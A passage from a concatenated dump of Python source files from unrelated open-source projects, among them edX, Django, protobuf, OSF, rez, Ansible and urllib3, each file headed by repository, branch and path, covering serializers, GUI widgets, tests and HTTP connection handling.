self.request = self.request_factory.get('/courses/edX/101/')
self.request.user = self.user
self.process_request()
self.assertContextSetTo({})
def test_anonymous_user(self):
self.request.user = AnonymousUserFactory()
self.process_request()
self.assertContextSetTo({'course_id': self.course_id, 'course_user_tags': {}})
def test_remove_context(self):
get_tracker = self.tracker.get_tracker # pylint: disable=maybe-no-member
exit_context = get_tracker.return_value.exit_context
# The middleware should clean up the context when the request is done
self.assertEquals(
self.middleware.process_response(self.request, self.response),
self.response
)
exit_context.assert_called_with(UserTagsEventContextMiddleware.CONTEXT_NAME)
exit_context.reset_mock()
# Even if the tracker blows up, the middleware should still return the response
get_tracker.side_effect = Exception
self.assertEquals(
self.middleware.process_response(self.request, self.response),
self.response
)
|
Pulgama/supriya
|
refs/heads/master
|
supriya/osc/OscCallback.py
|
1
|
from supriya.system.SupriyaObject import SupriyaObject
class OscCallback(SupriyaObject):
"""
An OSC callback.
::
>>> import supriya.osc
>>> callback = supriya.osc.OscCallback(
... address_pattern='/*',
... procedure=lambda x: print('GOT:', x),
... )
"""
### CLASS VARIABLES ###
__slots__ = ("_address_pattern", "_argument_template", "_is_one_shot", "_procedure")
### INITIALIZER ###
def __init__(
self,
address_pattern=None,
argument_template=None,
is_one_shot=False,
procedure=None,
):
self._address_pattern = address_pattern
if argument_template is not None:
argument_template = tuple(argument_template)
self._argument_template = argument_template
self._procedure = procedure
self._is_one_shot = bool(is_one_shot)
### SPECIAL METHODS ###
def __call__(self, message):
self._procedure(message)
### PUBLIC PROPERTIES ###
@property
def address_pattern(self):
"""
The address pattern of the callback.
::
>>> callback = supriya.osc.OscCallback(
... address_pattern='/*',
... procedure=lambda x: print('GOT:', x),
... )
>>> callback.address_pattern
'/*'
Returns string.
"""
return self._address_pattern
@property
def argument_template(self):
return self._argument_template
@property
def is_one_shot(self):
"""
Is true when the callback should be unregistered after being
called.
::
>>> callback = supriya.osc.OscCallback(
... address_pattern='/*',
... procedure=lambda x: print('GOT:', x),
... )
>>> callback.is_one_shot
False
Returns boolean.
"""
return self._is_one_shot
@property
def procedure(self):
"""
Gets the procedure to be called.
Returns callable.
"""
return self._procedure
|
IgorGolubenkov/sample-code
|
refs/heads/master
|
sample-code/examples/python/android_sauce.py
|
33
|
from appium import webdriver
from appium import SauceTestCase, on_platforms
app = "http://appium.s3.amazonaws.com/NotesList.apk"
platforms = [{
"platformName": "Android",
"platformVersion": "4.4",
"deviceName": "Android Emulator",
"appPackage": "com.example.android.notepad",
"appActivity": ".NotesList",
"app": app,
"appiumVersion": "1.3.4"
}]
@on_platforms(platforms)
class SimpleAndroidSauceTests(SauceTestCase):
def test_create_note(self):
el = self.driver.find_element_by_accessibility_id("New note")
el.click()
el = self.driver.find_element_by_class_name("android.widget.EditText")
el.send_keys("This is a new note!")
el = self.driver.find_element_by_accessibility_id("Save")
el.click()
els = self.driver.find_elements_by_class_name("android.widget.TextView")
self.assertEqual(els[2].text, "This is a new note!")
els[2].click()
|
retomerz/intellij-community
|
refs/heads/master
|
python/lib/Lib/site-packages/django/contrib/localflavor/jp/jp_prefectures.py
|
543
|
from django.utils.translation import ugettext_lazy
JP_PREFECTURES = (
('hokkaido', ugettext_lazy('Hokkaido'),),
('aomori', ugettext_lazy('Aomori'),),
('iwate', ugettext_lazy('Iwate'),),
('miyagi', ugettext_lazy('Miyagi'),),
('akita', ugettext_lazy('Akita'),),
('yamagata', ugettext_lazy('Yamagata'),),
('fukushima', ugettext_lazy('Fukushima'),),
('ibaraki', ugettext_lazy('Ibaraki'),),
('tochigi', ugettext_lazy('Tochigi'),),
('gunma', ugettext_lazy('Gunma'),),
('saitama', ugettext_lazy('Saitama'),),
('chiba', ugettext_lazy('Chiba'),),
('tokyo', ugettext_lazy('Tokyo'),),
('kanagawa', ugettext_lazy('Kanagawa'),),
('yamanashi', ugettext_lazy('Yamanashi'),),
('nagano', ugettext_lazy('Nagano'),),
('niigata', ugettext_lazy('Niigata'),),
('toyama', ugettext_lazy('Toyama'),),
('ishikawa', ugettext_lazy('Ishikawa'),),
('fukui', ugettext_lazy('Fukui'),),
('gifu', ugettext_lazy('Gifu'),),
('shizuoka', ugettext_lazy('Shizuoka'),),
('aichi', ugettext_lazy('Aichi'),),
('mie', ugettext_lazy('Mie'),),
('shiga', ugettext_lazy('Shiga'),),
('kyoto', ugettext_lazy('Kyoto'),),
('osaka', ugettext_lazy('Osaka'),),
('hyogo', ugettext_lazy('Hyogo'),),
('nara', ugettext_lazy('Nara'),),
('wakayama', ugettext_lazy('Wakayama'),),
('tottori', ugettext_lazy('Tottori'),),
('shimane', ugettext_lazy('Shimane'),),
('okayama', ugettext_lazy('Okayama'),),
('hiroshima', ugettext_lazy('Hiroshima'),),
('yamaguchi', ugettext_lazy('Yamaguchi'),),
('tokushima', ugettext_lazy('Tokushima'),),
('kagawa', ugettext_lazy('Kagawa'),),
('ehime', ugettext_lazy('Ehime'),),
('kochi', ugettext_lazy('Kochi'),),
('fukuoka', ugettext_lazy('Fukuoka'),),
('saga', ugettext_lazy('Saga'),),
('nagasaki', ugettext_lazy('Nagasaki'),),
('kumamoto', ugettext_lazy('Kumamoto'),),
('oita', ugettext_lazy('Oita'),),
('miyazaki', ugettext_lazy('Miyazaki'),),
('kagoshima', ugettext_lazy('Kagoshima'),),
('okinawa', ugettext_lazy('Okinawa'),),
)
|
OCForks/phantomjs
|
refs/heads/master
|
src/breakpad/src/third_party/protobuf/protobuf/python/google/protobuf/internal/message_listener.py
|
590
|
# Protocol Buffers - Google's data interchange format
# Copyright 2008 Google Inc. All rights reserved.
# http://code.google.com/p/protobuf/
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""Defines a listener interface for observing certain
state transitions on Message objects.
Also defines a null implementation of this interface.
"""
__author__ = 'robinson@google.com (Will Robinson)'
class MessageListener(object):
"""Listens for modifications made to a message. Meant to be registered via
Message._SetListener().
Attributes:
dirty: If True, then calling Modified() would be a no-op. This can be
used to avoid these calls entirely in the common case.
"""
def Modified(self):
"""Called every time the message is modified in such a way that the parent
message may need to be updated. This currently means either:
(a) The message was modified for the first time, so the parent message
should henceforth mark the message as present.
(b) The message's cached byte size became dirty -- i.e. the message was
modified for the first time after a previous call to ByteSize().
Therefore the parent should also mark its byte size as dirty.
Note that (a) implies (b), since new objects start out with a client cached
size (zero). However, we document (a) explicitly because it is important.
Modified() will *only* be called in response to one of these two events --
not every time the sub-message is modified.
Note that if the listener's |dirty| attribute is true, then calling
Modified at the moment would be a no-op, so it can be skipped. Performance-
sensitive callers should check this attribute directly before calling since
it will be true most of the time.
"""
raise NotImplementedError
class NullMessageListener(object):
"""No-op MessageListener implementation."""
def Modified(self):
pass
|
pattisdr/osf.io
|
refs/heads/develop
|
osf/management/commands/confirm_spam.py
|
5
|
"""Mark specified nodes as spam.
python manage.py confirm_spam abc12
"""
import logging
from django.core.management.base import BaseCommand
from osf.models import Guid, Preprint
logger = logging.getLogger(__name__)
def confirm_spam(guid):
node = guid.referent
referent_type = 'preprint' if isinstance(node, Preprint) else 'node'
logger.info('Marking {} {} as spam...'.format(referent_type, node._id))
saved_fields = {'is_public', } if referent_type == 'node' else {'is_published', }
content = node._get_spam_content(saved_fields | node.SPAM_CHECK_FIELDS)[:300]
# spam_data must be populated in order for confirm_spam to work
node.spam_data['headers'] = {
'Remote-Addr': '',
'User-Agent': '',
'Referer': '',
}
node.spam_data['content'] = content
node.spam_data['author'] = node.creator.fullname
node.spam_data['author_email'] = node.creator.username
node.confirm_spam()
node.save()
class Command(BaseCommand):
def add_arguments(self, parser):
super(Command, self).add_arguments(parser)
parser.add_argument('guids', type=str, nargs='+', help='List of Node or Preprint GUIDs')
def handle(self, *args, **options):
guids = options.get('guids', [])
for guid in Guid.objects.filter(_id__in=guids):
confirm_spam(guid)
|
nerdvegas/rez
|
refs/heads/master
|
src/rezgui/widgets/TimeSelecterPopup.py
|
1
|
from Qt import QtCore, QtWidgets, QtGui
from rezgui.util import update_font, create_pane
from rez.utils.formatting import readable_time_duration
import math
class Canvas(QtWidgets.QWidget):
secondsHover = QtCore.Signal(int)
secondsClicked = QtCore.Signal(int)
def __init__(self, width, height, parent=None):
super(Canvas, self).__init__(parent)
self.setCursor(QtCore.Qt.CrossCursor)
self.setMouseTracking(True)
self._width = width
self._height = height
def paintEvent(self, event):
rect = self.rect()
w = rect.width()
h = rect.height()
margin = 5
j = h / 4
p = QtGui.QPainter(self)
update_font(p, italic=True)
pal = QtGui.QPalette()
bg_brush = pal.brush(QtGui.QPalette.Active, QtGui.QPalette.Light)
p.fillRect(rect, bg_brush)
p.setPen(QtCore.Qt.DotLine)
p.drawLine(0, j, w, j)
p.drawLine(0, j * 2, w, j * 2)
p.drawLine(0, j * 3, w, j * 3)
p.setPen(pal.color(QtGui.QPalette.Disabled, QtGui.QPalette.WindowText))
p.drawText(margin, j - margin, "days")
p.drawText(margin, j * 2 - margin, "hours")
p.drawText(margin, j * 3 - margin, "minutes")
p.drawText(margin, j * 4 - margin, "seconds")
def leaveEvent(self, event):
self.secondsHover.emit(-1)
def mousePressEvent(self, event):
secs = self._get_seconds(event.pos())
self.secondsClicked.emit(secs)
def mouseMoveEvent(self, event):
secs = self._get_seconds(event.pos())
self.secondsHover.emit(secs)
def sizeHint(self):
return QtCore.QSize(self._width, self._height)
def _get_seconds(self, pos):
rect = self.rect()
x_norm = pos.x() / float(rect.width())
y_norm = min(1.0 - (pos.y() / float(rect.height())), 0.99)
unit = int(y_norm / 0.25)
y_norm -= unit * 0.25
y_norm *= 4.0
x_norm = max(min(x_norm, 0.99), 0.0)
y_norm = max(min(y_norm, 0.99), 0.0)
j = 2.5 * (1.0 - y_norm)
x_pow = 0.5 + (j * j / 2.5)
f = math.pow(x_norm, x_pow)
if unit == 0: # seconds
j = int(1.0 + f * 59)
secs = min(j, 59)
elif unit == 1: # minutes
j = int((1.0 + f * 60) * 60)
secs = min(j, 3600)
elif unit == 2: # hours
j = int((1.0 + f * 24) * 3600)
secs = min(j, 3600 * 24)
else: # days
j = int((1.0 + f * 7) * 3600 * 24)
secs = min(j, 3600 * 24 * 7)
return secs
class TimeSelecterPopup(QtWidgets.QFrame):
secondsClicked = QtCore.Signal(int)
def __init__(self, pivot_widget, width=240, height=160, parent=None):
super(TimeSelecterPopup, self).__init__(parent)
self.setFrameStyle(QtWidgets.QFrame.Panel | QtWidgets.QFrame.Raised)
self.setWindowFlags(QtCore.Qt.Popup)
self.seconds = None
self.label = QtWidgets.QLabel("")
canvas_frame = QtWidgets.QFrame()
canvas_frame.setFrameStyle(QtWidgets.QFrame.Panel | QtWidgets.QFrame.Sunken)
canvas = Canvas(width, height)
layout = QtWidgets.QVBoxLayout()
layout.setSpacing(2)
layout.setContentsMargins(2, 2, 2, 2)
layout.addWidget(canvas)
canvas_frame.setLayout(layout)
create_pane([self.label, canvas_frame], False, compact=True,
parent_widget=self)
self.adjustSize()
pt = pivot_widget.rect().topLeft()
global_pt = pivot_widget.mapToGlobal(pt)
self.move(global_pt - QtCore.QPoint(0, self.height()))
canvas.secondsHover.connect(self._secondsHover)
canvas.secondsClicked.connect(self._secondsClicked)
def _secondsHover(self, seconds):
if seconds == -1:
self.label.setText("")
else:
secs_txt = readable_time_duration(seconds)
self.label.setText("%s ago" % secs_txt)
def _secondsClicked(self, seconds):
self.secondsClicked.emit(seconds)
self.close()
# Copyright 2013-2016 Allan Johns.
#
# This library is free software: you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation, either
# version 3 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library. If not, see <http://www.gnu.org/licenses/>.
|
oberlin/django
|
refs/heads/master
|
django/core/serializers/pyyaml.py
|
439
|
"""
YAML serializer.
Requires PyYaml (http://pyyaml.org/), but that's checked for in __init__.
"""
import collections
import decimal
import sys
from io import StringIO
import yaml
from django.core.serializers.base import DeserializationError
from django.core.serializers.python import (
Deserializer as PythonDeserializer, Serializer as PythonSerializer,
)
from django.db import models
from django.utils import six
# Use the C (faster) implementation if possible
try:
from yaml import CSafeLoader as SafeLoader
from yaml import CSafeDumper as SafeDumper
except ImportError:
from yaml import SafeLoader, SafeDumper
class DjangoSafeDumper(SafeDumper):
def represent_decimal(self, data):
return self.represent_scalar('tag:yaml.org,2002:str', str(data))
def represent_ordered_dict(self, data):
return self.represent_mapping('tag:yaml.org,2002:map', data.items())
DjangoSafeDumper.add_representer(decimal.Decimal, DjangoSafeDumper.represent_decimal)
DjangoSafeDumper.add_representer(collections.OrderedDict, DjangoSafeDumper.represent_ordered_dict)
class Serializer(PythonSerializer):
"""
Convert a queryset to YAML.
"""
internal_use_only = False
def handle_field(self, obj, field):
# A nasty special case: base YAML doesn't support serialization of time
# types (as opposed to dates or datetimes, which it does support). Since
# we want to use the "safe" serializer for better interoperability, we
# need to do something with those pesky times. Converting 'em to strings
# isn't perfect, but it's better than a "!!python/time" type which would
# halt deserialization under any other language.
if isinstance(field, models.TimeField) and getattr(obj, field.name) is not None:
self._current[field.name] = str(getattr(obj, field.name))
else:
super(Serializer, self).handle_field(obj, field)
def end_serialization(self):
yaml.dump(self.objects, self.stream, Dumper=DjangoSafeDumper, **self.options)
def getvalue(self):
# Grand-parent super
return super(PythonSerializer, self).getvalue()
def Deserializer(stream_or_string, **options):
"""
Deserialize a stream or string of YAML data.
"""
if isinstance(stream_or_string, bytes):
stream_or_string = stream_or_string.decode('utf-8')
if isinstance(stream_or_string, six.string_types):
stream = StringIO(stream_or_string)
else:
stream = stream_or_string
try:
for obj in PythonDeserializer(yaml.load(stream, Loader=SafeLoader), **options):
yield obj
except GeneratorExit:
raise
except Exception as e:
# Map to deserializer error
six.reraise(DeserializationError, DeserializationError(e), sys.exc_info()[2])
|
pklimai/py-junos-eznc
|
refs/heads/master
|
lib/jnpr/junos/resources/syslog.py
|
3
|
"""
Pythonifier for Syslog Table/View
"""
from jnpr.junos.factory import loadyaml
from os.path import splitext
_YAML_ = splitext(__file__)[0] + '.yml'
globals().update(loadyaml(_YAML_))
|
ProfessionalIT/professionalit-webiste
|
refs/heads/master
|
sdk/google_appengine/lib/django-1.4/django/contrib/gis/geoip/prototypes.py
|
200
|
from ctypes import c_char_p, c_float, c_int, string_at, Structure, POINTER
from django.contrib.gis.geoip.libgeoip import lgeoip, free
#### GeoIP C Structure definitions ####
class GeoIPRecord(Structure):
_fields_ = [('country_code', c_char_p),
('country_code3', c_char_p),
('country_name', c_char_p),
('region', c_char_p),
('city', c_char_p),
('postal_code', c_char_p),
('latitude', c_float),
('longitude', c_float),
# TODO: In 1.4.6 this changed from `int dma_code;` to
# `union {int metro_code; int dma_code;};`. Change
# to a `ctypes.Union` in to accomodate in future when
# pre-1.4.6 versions are no longer distributed.
('dma_code', c_int),
('area_code', c_int),
('charset', c_int),
('continent_code', c_char_p),
]
geoip_char_fields = [name for name, ctype in GeoIPRecord._fields_ if ctype is c_char_p]
geoip_encodings = { 0: 'iso-8859-1',
1: 'utf8',
}
class GeoIPTag(Structure): pass
RECTYPE = POINTER(GeoIPRecord)
DBTYPE = POINTER(GeoIPTag)
#### ctypes function prototypes ####
# GeoIP_lib_version appeared in version 1.4.7.
if hasattr(lgeoip, 'GeoIP_lib_version'):
GeoIP_lib_version = lgeoip.GeoIP_lib_version
GeoIP_lib_version.argtypes = None
GeoIP_lib_version.restype = c_char_p
else:
GeoIP_lib_version = None
# For freeing memory allocated within a record
GeoIPRecord_delete = lgeoip.GeoIPRecord_delete
GeoIPRecord_delete.argtypes = [RECTYPE]
GeoIPRecord_delete.restype = None
# For retrieving records by name or address.
def check_record(result, func, cargs):
if bool(result):
# Checking the pointer to the C structure, if valid pull out elements
# into a dicionary.
rec = result.contents
record = dict((fld, getattr(rec, fld)) for fld, ctype in rec._fields_)
# Now converting the strings to unicode using the proper encoding.
encoding = geoip_encodings[record['charset']]
for char_field in geoip_char_fields:
if record[char_field]:
record[char_field] = record[char_field].decode(encoding)
# Free the memory allocated for the struct & return.
GeoIPRecord_delete(result)
return record
else:
return None
def record_output(func):
func.argtypes = [DBTYPE, c_char_p]
func.restype = RECTYPE
func.errcheck = check_record
return func
GeoIP_record_by_addr = record_output(lgeoip.GeoIP_record_by_addr)
GeoIP_record_by_name = record_output(lgeoip.GeoIP_record_by_name)
# For opening & closing GeoIP database files.
GeoIP_open = lgeoip.GeoIP_open
GeoIP_open.restype = DBTYPE
GeoIP_delete = lgeoip.GeoIP_delete
GeoIP_delete.argtypes = [DBTYPE]
GeoIP_delete.restype = None
# This is so the string pointer can be freed within Python.
class geoip_char_p(c_char_p):
pass
def check_string(result, func, cargs):
if result:
s = string_at(result)
free(result)
else:
s = ''
return s
GeoIP_database_info = lgeoip.GeoIP_database_info
GeoIP_database_info.restype = geoip_char_p
GeoIP_database_info.errcheck = check_string
# String output routines.
def string_output(func):
func.restype = c_char_p
return func
GeoIP_country_code_by_addr = string_output(lgeoip.GeoIP_country_code_by_addr)
GeoIP_country_code_by_name = string_output(lgeoip.GeoIP_country_code_by_name)
GeoIP_country_name_by_addr = string_output(lgeoip.GeoIP_country_name_by_addr)
GeoIP_country_name_by_name = string_output(lgeoip.GeoIP_country_name_by_name)
|
sassoftware/mint
|
refs/heads/master
|
mint_test/resttest/apitest/modulehookstest.py
|
1
|
#!/usr/bin/python
#
# Copyright (c) SAS Institute Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import os
import re
import time
from conary import conaryclient
from conary import constants as conaryConstants
from conary.lib import util
from mint import buildtypes
from mint import constants
from rpath_proddef import api1 as proddef
import restbase
from restlib import client as restClient
ResponseError = restClient.ResponseError
class ModuleHooksTest(restbase.BaseRestTest):
def setUp(self):
restbase.BaseRestTest.setUp(self)
self.f1 = open('/%s/test1.swf' % self.tmpDir,'w')
self.f2 = open('/%s/test2.swf' % self.tmpDir,'w')
def tearDown(self):
os.remove(self.f1.name)
os.remove(self.f2.name)
def testGetInfo(self):
uriTemplate = '/moduleHooks'
uri = uriTemplate
client = self.getRestClient()
self.mintCfg.moduleHooksDir = self.tmpDir
response = client.call('GET', uri, convert=False)[1]
self.failUnlessEqual(len(response.moduleHooks), 2)
|
bowlofstew/Impala
|
refs/heads/cdh5-trunk
|
tests/__init__.py
|
186
|
# This file is needed to make the files in this directory a python module
|
funkring/fdoo
|
refs/heads/8.0-fdoo
|
addons/base_report_designer/__init__.py
|
421
|
# -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import wizard
import base_report_designer
import installer
import openerp_sxw2rml
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
|
Qalthos/ansible
|
refs/heads/devel
|
test/units/utils/test_context_objects.py
|
29
|
# -*- coding: utf-8 -*-
# Copyright: (c) 2018, Toshio Kuratomi <tkuratomi@ansible.com>
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
# Make coding more python3-ish
from __future__ import (absolute_import, division)
__metaclass__ = type
try:
import argparse
except ImportError:
argparse = None
import optparse
import pytest
from ansible.module_utils.common.collections import ImmutableDict
from ansible.utils import context_objects as co
MAKE_IMMUTABLE_DATA = ((u'くらとみ', u'くらとみ'),
(42, 42),
({u'café': u'くらとみ'}, ImmutableDict({u'café': u'くらとみ'})),
([1, u'café', u'くらとみ'], (1, u'café', u'くらとみ')),
(set((1, u'café', u'くらとみ')), frozenset((1, u'café', u'くらとみ'))),
({u'café': [1, set(u'ñ')]},
ImmutableDict({u'café': (1, frozenset(u'ñ'))})),
([set((1, 2)), {u'くらとみ': 3}],
(frozenset((1, 2)), ImmutableDict({u'くらとみ': 3}))),
)
@pytest.mark.parametrize('data, expected', MAKE_IMMUTABLE_DATA)
def test_make_immutable(data, expected):
assert co._make_immutable(data) == expected
def test_cliargs_from_dict():
old_dict = {'tags': [u'production', u'webservers'],
'check_mode': True,
'start_at_task': u'Start with くらとみ'}
expected = frozenset((('tags', (u'production', u'webservers')),
('check_mode', True),
('start_at_task', u'Start with くらとみ')))
assert frozenset(co.CLIArgs(old_dict).items()) == expected
def test_cliargs():
class FakeOptions:
pass
options = FakeOptions()
options.tags = [u'production', u'webservers']
options.check_mode = True
options.start_at_task = u'Start with くらとみ'
expected = frozenset((('tags', (u'production', u'webservers')),
('check_mode', True),
('start_at_task', u'Start with くらとみ')))
assert frozenset(co.CLIArgs.from_options(options).items()) == expected
@pytest.mark.skipIf(argparse is None)
def test_cliargs_argparse():
parser = argparse.ArgumentParser(description='Process some integers.')
parser.add_argument('integers', metavar='N', type=int, nargs='+',
help='an integer for the accumulator')
parser.add_argument('--sum', dest='accumulate', action='store_const',
const=sum, default=max,
help='sum the integers (default: find the max)')
args = parser.parse_args([u'--sum', u'1', u'2'])
expected = frozenset((('accumulate', sum), ('integers', (1, 2))))
assert frozenset(co.CLIArgs.from_options(args).items()) == expected
# Can get rid of this test when we port ansible.cli from optparse to argparse
def test_cliargs_optparse():
parser = optparse.OptionParser(description='Process some integers.')
parser.add_option('--sum', dest='accumulate', action='store_const',
const=sum, default=max,
help='sum the integers (default: find the max)')
opts, args = parser.parse_args([u'--sum', u'1', u'2'])
opts.integers = args
expected = frozenset((('accumulate', sum), ('integers', (u'1', u'2'))))
assert frozenset(co.CLIArgs.from_options(opts).items()) == expected
|
ryfeus/lambda-packs
|
refs/heads/master
|
Lxml_requests/source/requests/packages/urllib3/connection.py
|
64
|
from __future__ import absolute_import
import datetime
import logging
import os
import sys
import socket
from socket import error as SocketError, timeout as SocketTimeout
import warnings
from .packages import six
from .packages.six.moves.http_client import HTTPConnection as _HTTPConnection
from .packages.six.moves.http_client import HTTPException # noqa: F401
try: # Compiled with SSL?
import ssl
BaseSSLError = ssl.SSLError
except (ImportError, AttributeError): # Platform-specific: No SSL.
ssl = None
class BaseSSLError(BaseException):
pass
try: # Python 3:
# Not a no-op, we're adding this to the namespace so it can be imported.
ConnectionError = ConnectionError
except NameError: # Python 2:
class ConnectionError(Exception):
pass
from .exceptions import (
NewConnectionError,
ConnectTimeoutError,
SubjectAltNameWarning,
SystemTimeWarning,
)
from .packages.ssl_match_hostname import match_hostname, CertificateError
from .util.ssl_ import (
resolve_cert_reqs,
resolve_ssl_version,
assert_fingerprint,
create_urllib3_context,
ssl_wrap_socket
)
from .util import connection
from ._collections import HTTPHeaderDict
log = logging.getLogger(__name__)
port_by_scheme = {
'http': 80,
'https': 443,
}
RECENT_DATE = datetime.date(2014, 1, 1)
class DummyConnection(object):
"""Used to detect a failed ConnectionCls import."""
pass
class HTTPConnection(_HTTPConnection, object):
"""
Based on httplib.HTTPConnection but provides an extra constructor
backwards-compatibility layer between older and newer Pythons.
Additional keyword parameters are used to configure attributes of the connection.
Accepted parameters include:
- ``strict``: See the documentation on :class:`urllib3.connectionpool.HTTPConnectionPool`
- ``source_address``: Set the source address for the current connection.
.. note:: This is ignored for Python 2.6. It is only applied for 2.7 and 3.x
- ``socket_options``: Set specific options on the underlying socket. If not specified, then
defaults are loaded from ``HTTPConnection.default_socket_options`` which includes disabling
Nagle's algorithm (sets TCP_NODELAY to 1) unless the connection is behind a proxy.
For example, if you wish to enable TCP Keep Alive in addition to the defaults,
you might pass::
HTTPConnection.default_socket_options + [
(socket.SOL_SOCKET, socket.SO_KEEPALIVE, 1),
]
Or you may want to disable the defaults by passing an empty list (e.g., ``[]``).
"""
default_port = port_by_scheme['http']
#: Disable Nagle's algorithm by default.
#: ``[(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)]``
default_socket_options = [(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)]
#: Whether this connection verifies the host's certificate.
is_verified = False
def __init__(self, *args, **kw):
if six.PY3: # Python 3
kw.pop('strict', None)
# Pre-set source_address in case we have an older Python like 2.6.
self.source_address = kw.get('source_address')
if sys.version_info < (2, 7): # Python 2.6
# _HTTPConnection on Python 2.6 will balk at this keyword arg, but
# not newer versions. We can still use it when creating a
# connection though, so we pop it *after* we have saved it as
# self.source_address.
kw.pop('source_address', None)
#: The socket options provided by the user. If no options are
#: provided, we use the default options.
self.socket_options = kw.pop('socket_options', self.default_socket_options)
# Superclass also sets self.source_address in Python 2.7+.
_HTTPConnection.__init__(self, *args, **kw)
def _new_conn(self):
""" Establish a socket connection and set nodelay settings on it.
:return: New socket connection.
"""
extra_kw = {}
if self.source_address:
extra_kw['source_address'] = self.source_address
if self.socket_options:
extra_kw['socket_options'] = self.socket_options
try:
conn = connection.create_connection(
(self.host, self.port), self.timeout, **extra_kw)
except SocketTimeout as e:
raise ConnectTimeoutError(
self, "Connection to %s timed out. (connect timeout=%s)" %
(self.host, self.timeout))
except SocketError as e:
raise NewConnectionError(
self, "Failed to establish a new connection: %s" % e)
return conn
def _prepare_conn(self, conn):
self.sock = conn
# the _tunnel_host attribute was added in python 2.6.3 (via
# http://hg.python.org/cpython/rev/0f57b30a152f) so pythons 2.6(0-2) do
# not have them.
if getattr(self, '_tunnel_host', None):
# TODO: Fix tunnel so it doesn't depend on self.sock state.
self._tunnel()
# Mark this connection as not reusable
self.auto_open = 0
def connect(self):
conn = self._new_conn()
self._prepare_conn(conn)
def request_chunked(self, method, url, body=None, headers=None):
"""
Alternative to the common request method, which sends the
body with chunked encoding and not as one block
"""
headers = HTTPHeaderDict(headers if headers is not None else {})
skip_accept_encoding = 'accept-encoding' in headers
skip_host = 'host' in headers
self.putrequest(
method,
url,
skip_accept_encoding=skip_accept_encoding,
skip_host=skip_host
)
for header, value in headers.items():
self.putheader(header, value)
if 'transfer-encoding' not in headers:
self.putheader('Transfer-Encoding', 'chunked')
self.endheaders()
if body is not None:
stringish_types = six.string_types + (six.binary_type,)
if isinstance(body, stringish_types):
body = (body,)
for chunk in body:
if not chunk:
continue
if not isinstance(chunk, six.binary_type):
chunk = chunk.encode('utf8')
len_str = hex(len(chunk))[2:]
self.send(len_str.encode('utf-8'))
self.send(b'\r\n')
self.send(chunk)
self.send(b'\r\n')
# After the if clause, to always have a closed body
self.send(b'0\r\n\r\n')
class HTTPSConnection(HTTPConnection):
default_port = port_by_scheme['https']
ssl_version = None
def __init__(self, host, port=None, key_file=None, cert_file=None,
strict=None, timeout=socket._GLOBAL_DEFAULT_TIMEOUT,
ssl_context=None, **kw):
HTTPConnection.__init__(self, host, port, strict=strict,
timeout=timeout, **kw)
self.key_file = key_file
self.cert_file = cert_file
self.ssl_context = ssl_context
# Required property for Google AppEngine 1.9.0 which otherwise causes
# HTTPS requests to go out as HTTP. (See Issue #356)
self._protocol = 'https'
def connect(self):
conn = self._new_conn()
self._prepare_conn(conn)
if self.ssl_context is None:
self.ssl_context = create_urllib3_context(
ssl_version=resolve_ssl_version(None),
cert_reqs=resolve_cert_reqs(None),
)
self.sock = ssl_wrap_socket(
sock=conn,
keyfile=self.key_file,
certfile=self.cert_file,
ssl_context=self.ssl_context,
)
class VerifiedHTTPSConnection(HTTPSConnection):
"""
Based on httplib.HTTPSConnection but wraps the socket with
SSL certification.
"""
cert_reqs = None
ca_certs = None
ca_cert_dir = None
ssl_version = None
assert_fingerprint = None
def set_cert(self, key_file=None, cert_file=None,
cert_reqs=None, ca_certs=None,
assert_hostname=None, assert_fingerprint=None,
ca_cert_dir=None):
"""
